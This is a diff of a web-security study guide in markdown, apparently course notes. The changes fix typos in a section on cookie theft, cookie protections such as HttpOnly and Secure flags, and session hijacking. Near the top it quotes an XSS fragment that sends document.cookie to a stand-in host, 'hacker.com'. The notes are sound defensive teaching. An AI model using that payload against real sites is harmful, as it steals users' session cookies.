jizusun/web-security-guide/lynda-web-security.md

 ``'http://hacker.com?steal=' + document.cookie``
 - Cookies can be sniffed by observing network traffic
 - Cookie Solutions
-    - Only put non-senstive data in cookies (e.g., preferences)
+    - Only put non-sensitive data in cookies (e.g., preferences)
     - Use `HttpOnly` cookies
         - will make the cookie unavailable to JavaScript
         - Still not supported by older browsers
     - Use Secure cookies (HTTPS only), which means you can't eavesdrop on them
     - Set cookie expiration date
     - Set cookie domain and path
-- Encryt cookie data
+- Encrypt cookie data
 - Use server-side sessions instead of client-side cookies (not considering session hijecking yet)

 ### Session hijacking

 - Session ID is used to reference sensitive data on the server
 - Similar to cookie theft but much more valuable
 - Can be used to assume your identity and logged-in status